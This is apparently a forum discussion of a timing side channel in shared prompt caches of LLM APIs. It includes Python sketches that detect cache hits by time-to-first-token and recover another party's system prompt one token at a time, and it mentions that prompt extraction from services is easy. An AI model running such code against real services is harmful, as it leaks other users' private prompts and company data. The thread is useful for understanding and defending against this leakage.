The only thing that comes to mind is some kind of timing attack: send lots of requests with prompts specific to a company you're trying to spy on, and if one comes back cached, you know someone has sent that prompt recently. It would be an expensive attack, though, with a large search space.
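Roughly, the cache-hit oracle would be something like the sketch below. It's hypothetical: the endpoint URL, model name, and latency margin are all assumptions, not any particular provider's API. The idea is just that a cache hit skips prefill, so time-to-first-token drops measurably.

    import time
    import requests

    API_URL = "https://api.example.com/v1/completions"  # hypothetical endpoint

    def ttft(prompt: str) -> float:
        """Return time-to-first-token for a streamed completion request."""
        start = time.monotonic()
        payload = {"model": "some-model", "prompt": prompt,
                   "max_tokens": 1, "stream": True}
        with requests.post(API_URL, json=payload, stream=True, timeout=30) as resp:
            for _ in resp.iter_lines():
                # The first streamed chunk marks the first generated token.
                return time.monotonic() - start
        return float("inf")

    def looks_cached(prompt: str, baseline_ttft: float, margin: float = 0.05) -> bool:
        # A cache hit skips prefill, so TTFT lands well below the
        # uncached baseline; the margin is a made-up noise threshold.
        return ttft(prompt) < baseline_ttft - margin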
I have come across claims that turning on caching means the LLM has a faint memory of what was in the cache, even for unrelated queries. If that is the case, it's completely unreasonable to share the cache, because of the possibility of information leakage.
No, the search space is tiny: you can just attack one BPE token at a time! Stuff like password guessing becomes almost trivial when you get to run a timing attack on each successive character, and the same applies here to each successive token. So that lets you quickly exfiltrate arbitrary numbers of prompts, especially if you have any idea what you are looking for. (Note that a lot of prompts are already public information, or you can already exfiltrate prompts quite easily from services and start attacking from there...)
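Concretely, the token-at-a-time version might look like the following sketch, reusing the ttft() helper from the comment above. The candidate list, prefix, and token budget are illustrative assumptions; a real attack would iterate over a pruned BPE vocabulary rather than a toy list.

    # Candidate next tokens; in practice, a pruned BPE vocabulary.
    CANDIDATES = [" the", " a", " password", " secret"]

    def exfiltrate(known_prefix: str, max_tokens: int = 50) -> str:
        recovered = known_prefix
        for _ in range(max_tokens):
            # Only the true continuation extends the cached prefix, so it
            # should come back with the fastest time-to-first-token.
            timings = {tok: ttft(recovered + tok) for tok in CANDIDATES}
            best = min(timings, key=timings.get)
            recovered += best
        return recovered

    # e.g. exfiltrate("You are the internal assistant for AcmeCorp.")

Knowing even a generic opening line for the target's prompt (and many follow public templates) gives you a cached prefix to start extending from.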